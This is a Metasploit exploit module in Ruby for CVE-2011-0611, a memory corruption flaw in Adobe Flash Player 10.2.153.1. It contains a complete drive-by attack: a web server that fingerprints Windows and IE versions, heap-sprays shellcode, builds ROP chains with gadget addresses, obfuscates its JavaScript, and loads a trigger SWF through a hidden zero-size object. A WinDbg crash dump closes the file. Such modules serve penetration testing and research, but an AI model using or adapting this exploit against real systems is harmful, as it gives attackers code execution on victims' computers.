##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Browser exploit module for CVE-2011-0611 (Adobe Flash Player 10.2.153.1).
#
# The HTTP server side answers two kinds of request (see #on_request_uri):
# a URI ending in ".swf" receives the pre-built trigger file that #exploit
# loads from <data_directory>/exploits/CVE-2011-0611.swf; every other URI
# receives an HTML page whose script performs two heapLib-driven sprays and
# then embeds that .swf through an <object>/<embed> pair. The target is
# either the user-chosen one or, for 'Automatic', picked from the User-Agent
# header in #get_target.
#
# What a defender sees on the wire is the generated HTML below (Flash ActiveX
# classid, a width="0" height="0" object, the spray script — obfuscated by
# default via OBFUSCATE) followed by a second response with
# Content-Type: application/x-shockwave-flash for the trigger.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  # Module metadata and options.
  #
  # Each explicit target carries the per-target constants that
  # #on_request_uri consumes:
  #   'Rop'     - whether a ROP chain (via generate_rop_payload) is built
  #   'Pivot'   - stack-pivot gadget address for ROP targets, nil otherwise
  #   'Offset1' / 'Offset2' - alignment offsets, interpolated as JS literals
  #                           into the first (payload) and second (pointer)
  #                           heap_spray() call
  #   'Max1' / 'Max2'       - upper bound of each spray's allocation loop,
  #                           also interpolated as JS literals
  # Target indices 1..5 are relied on by #get_target, so the order matters.
  def initialize(info={})
    super(update_info(info,
      'Name' => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",
      'Description' => %q{
        This module exploits a vulnerability in Adobe Flash Player that was discovered,
        and has been exploited actively in the wild. By embedding a specially crafted .swf
        file, Adobe Flash crashes due to an invalid use of an object type, which allows
        attackers to overwrite a pointer in memory, and results arbitrary code execution.
        Please note for IE 8 targets, Java Runtime Environment must be available on the
        victim machine in order to work properly.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'sinn3r',
        ],
      'References' =>
        [
          [ 'CVE', '2011-0611' ],
          [ 'OSVDB', '71686' ],
          [ 'BID', '47314' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],
          [ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],
          [ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],
          [ 'URL', 'http://web.archive.org/web/20110417154057/http://secunia.com:80/blog/210/' ],
        ],
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "process",
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # Index 0: resolved per request by #get_target.
          [ 'Automatic', {} ],
          [
            'IE 6 on Windows XP SP3',
            {
              'Rop' => false,
              'Pivot' => nil, # No ROP, no pivot
              'Offset1' => '0x01', # For aligning the payload
              'Offset2' => '0x02', # For aligning the CALL
              'Max1' => '0x150', # First spray
              'Max2' => '0x200' # Second spray
            }
          ],
          [
            'IE 7 on Windows XP SP3',
            {
              'Rop' => false,
              'Pivot' => nil, # No ROP, no pivot
              'Offset1' => '0x01', # For aligning the payload
              'Offset2' => '0x02', # For aligning the CALL
              'Max1' => '0x150', # First spray
              'Max2' => '0x200' # Second spray
            }
          ],
          [
            'IE 8 on Windows XP SP3',
            {
              'Rop' => true,
              'Pivot' => 0x7c348b05, # XCHG EAX,ESP; RETN (MSVCR71.dll)
              'Offset1' => '0x5E2', # Offset for rop+payload
              'Offset2' => '0x02', # Offset to 0x11111110
              'Max1' => '0x250', # First spray
              'Max2' => '0x200' # Second spray
            }
          ],
          [
            'IE 7 on Windows Vista',
            {
              'Rop' => false,
              'Pivot' => nil, # No ROP, no pivot
              'Offset1' => '0x01', # For aligning the payload
              'Offset2' => '0x02', # For aligning the CALL
              'Max1' => '0x150', # First spray
              'Max2' => '0x200' # Second spray
            }
          ],
          [
            'IE 8 on Windows 7',
            {
              'Rop' => true,
              'Pivot' => 0x7c348b05, # XCHG EAX,ESP; RETN (MSVCR71.dll)
              'Offset1' => '0x5F4', # Offset for rop+payload
              'Offset2' => '0x02', # Offset to 0x11111110
              'Max1' => '0x101', # First spray
              'Max2' => '0x300' # Second spray
            }
          ]
        ],
      'Privileged' => false,
      'DisclosureDate' => '2011-04-11',
      'DefaultTarget' => 0))

    register_options(
      [
        # Defaults to true: the generated script is run through JSObfu
        # in #on_request_uri unless the operator turns this off.
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
      ], self.class
    )

  end

  # Loads the trigger SWF from the framework data directory into @trigger,
  # then hands control to the HttpServer mixin (super) to serve requests.
  #
  # NOTE(review): File.open is not used in block form, so if read raises the
  # handle is never closed; File.binread(path) would do the same in one call.
  def exploit
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-0611.swf")
    f = File.open(path, "rb")
    @trigger = f.read(f.stat.size)
    f.close
    super
  end

  # Picks an explicit target from the request's User-Agent header.
  #
  # Both the OS token (NT 5.1 / NT 6.0 / NT 6.1) and the browser token
  # (MSIE 6.0 / 7.0 / 8.0) must match; indices refer to the 'Targets' order
  # declared in #initialize.
  #
  # @param request the incoming HTTP request; only request.headers is read
  # @return [Array, nil] the matching targets[] entry, or nil when no pair of
  #   patterns matches. A request without a User-Agent leaves agent nil and
  #   nil =~ regex is nil, so it also falls through to the nil branch.
  def get_target(request)
    agent = request.headers['User-Agent']

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
      # Windows XP SP3 + IE 6.0
      return targets[1]
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
      # Windows XP SP3 + IE 7.0
      return targets[2]
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
      # Windows XP SP3 + IE 8.0 + JRE6
      return targets[3]
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
      # Windows Vista + IE 7
      return targets[4]
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
      # Windows 7 + IE 8 + JRE6
      return targets[5]
    else
      return nil
    end
  end

  # HTTP request handler (called by the HttpServer mixin for every request).
  #
  # Flow:
  #   1. resolve the target (explicit, or via #get_target for 'Automatic';
  #      unknown agents get a 404 and nothing else);
  #   2. a URI ending in ".swf" is answered with the @trigger bytes;
  #   3. any other URI is answered with the HTML page built below: the
  #      heapLib spray script (payload spray, then fake-pointer spray) and
  #      an <object>/<embed> pointing at a random <resource>/<name>.swf.
  #
  # @param cli the client connection passed to send_response / send_not_found
  # @param request the HTTP request; request.uri and its headers are read
  def on_request_uri(cli, request)
    # Set default target
    my_target = target

    # If user chooses automatic target, we choose one based on user agent
    if my_target.name =~ /Automatic/
      my_target = get_target(request)
      if my_target.nil?
        print_error("Sending 404 for unknown user-agent")
        send_not_found(cli)
        return
      end
      vprint_status("Target selected: #{my_target.name}")
    end

    vprint_status("URL: #{request.uri}")

    if request.uri =~ /\.swf$/
      # Browser is fetching the trigger file referenced from the HTML page
      print_status("Sending trigger SWF...")
      send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )
      return
    end

    # Targets that don't need ROP: a tiny stub used as the second spray
    pivot = "\xb8\x0c\x0c\x0c\x0c" # MOV EAX,0x0c0c0c0c
    pivot << "\xff\xe0" # JMP EAX
    pivot << "\x41" # Pad

    # Targets that need ROP: replace the stub with the pivot sequence and
    # prepend a ROP chain (RopDb, 'java' set) to the encoded payload.
    if my_target['Rop']
      # Target Addr=0x11111110
      pivot =
        [
          0x0c0c0c0c, # Padding. Value for ESP after the XCHG pivot
          my_target['Pivot'], # ROP Pivot
          0x7c346b52, # EAX (POP ESP; RETN)
        ].pack('V*')

      # Target Addr=0x0c0c0c0c
      p = generate_rop_payload('java', payload.encoded)
    else
      p = payload.encoded
    end

    # Endianness for the %u-escaping below is taken from the target arch.
    arch = Rex::Arch.endian(my_target.arch)

    shellcode = Rex::Text.to_unescape(p, arch)
    pivot = Rex::Text.to_unescape(pivot, arch)

    # Extract string based on target: per-target start/length of the block
    # each spray iteration allocates (substituted into the script as-is).
    if my_target.name == 'IE 8 on Windows 7'
      js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);"
    elsif my_target.name == 'IE 8 on Windows XP SP3'
      js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
    else
      js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
    end

    # Random (1..100 alpha chars) JS identifier holding the escaped nop string.
    randnop = rand_text_alpha(rand(100) + 1)
    js_nops = Rex::Text.to_unescape("\x0c"*4)

    # heap_spray() is called twice: once with the payload, once with the
    # pivot bytes as both filler and content. Offset/Max come from the target.
    js = <<-JS
      function heap_spray(heaplib, nops, code, offset, max) {
        while (nops.length < 0x2000) nops += nops;
        var offset = nops.substring(0, offset);
        var shellcode = offset + code + nops.substring(0, 0x2000-code.length-offset.length);
        while (shellcode.length < 0x40000) shellcode += shellcode;
        #{js_extract_str}
        heaplib.gc();
        for (var i=1; i<max; i++) {
          heaplib.alloc(block);
        }
      }

      var heap_obj = new heapLib.ie(0x20000);
      var #{randnop} = "#{js_nops}";
      var nops = unescape(#{randnop});
      var code = unescape("#{shellcode}");
      heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});
      var fake_pointers = unescape("#{pivot}");
      heap_spray(heap_obj, fake_pointers, fake_pointers, #{my_target['Offset2']}, #{my_target['Max2']});
    JS

    # heaplib() comes from HttpServer::HTML; presumably it adds the heapLib
    # support code that the script's heapLib.ie call relies on — confirm there.
    js = heaplib(js, {:noobfu => true} )

    # Javascript obfuscation is optional (OBFUSCATE defaults to true). After
    # this, js is a JSObfu object; the heredoc below relies on its to_s.
    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate(memory_sensitive: true)
    end

    # rand(3) yields 0..2, so the basename before ".swf" is 0-2 alpha chars.
    trigger_file_name = "#{get_resource}/#{rand_text_alpha(rand(3))}.swf"

    # Body lines are kept at a four-space indent on purpose: the gsub below
    # strips exactly that prefix from every line (including the script's).
    html = <<-EOS
    <html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"
    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{trigger_file_name}" />
    <embed src="#{trigger_file_name}" quality="high" type="application/x-shockwave-flash"
    pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>
    </body>
    </html>
    EOS

    html = html.gsub(/^ {4}/, "")

    # NOTE(review): the status line names no peer; other modules log cli.peerhost here.
    print_status("Sending HTML to...")
    send_response(cli, html, {'Content-Type' => "text/html"} )
  end
end


# WinDbg crash context recorded by the author: the faulting instruction in
# Flash10o calls through [eax+8] with eax=0x11111110, the "Target Addr" the
# ROP pivot comments above refer to; ecx points at the sprayed fake object.
=begin
0:000> r
eax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0
eip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
Flash10o+0xd01f6:
100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????
0:000> dd ecx
01d650b0 11111110 00000000 00000000 00000000
01d650c0 00000000 00000000 00000000 00000000
01d650d0 00000000 00000000 00000000 00000000
01d650e0 00000000 00000000 00000000 00000000
01d650f0 00000000 00000000 00000000 00000000
01d65100 00000000 00000000 00000000 00000000
01d65110 00000000 00000000 00000000 00000000
01d65120 00000000 00000000 00000000 00000000

=end